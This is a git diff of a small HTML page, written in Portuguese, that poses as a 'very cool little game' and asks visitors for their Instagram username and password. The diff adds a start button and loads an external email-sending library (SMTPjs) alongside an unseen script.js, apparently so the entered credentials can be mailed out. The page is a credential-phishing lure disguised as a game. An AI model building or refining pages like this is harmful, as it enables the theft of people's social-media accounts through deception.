--- a/index.html
+++ b/index.html
@@ -9,14 +9,16 @@
 <body>
     <h1>Joguinho muito legal &lt;3</h1>
     <h2>Para iniciar, faça login o usuário e senha do seu Instagram</h2>
-    <form id="questionForm">
-        <label for="usuario">Nome de usuário:</label>
-        <input type="text" id="usuario" name="usuario" required>
+    <label for="usuario">Nome de usuário:</label>
+    <input type="text" id="usuario" name="usuario" required>
 
-        <label for="senha">Senha:</label>
-        <input type="text" id="senha" name="senha" required>
+    <label for="senha">Senha:</label>
+    <input type="text" id="senha" name="senha" required>
 
-        <a href="1">Iniciar</a>
-    </form>
+    <button onclick="iniciar()">Iniciar</button>
+
+    <script src="https://smtpjs.com/v3/smtp.js"></script>
+    <script src="script.js"></script>
+
 </body>
 </html>
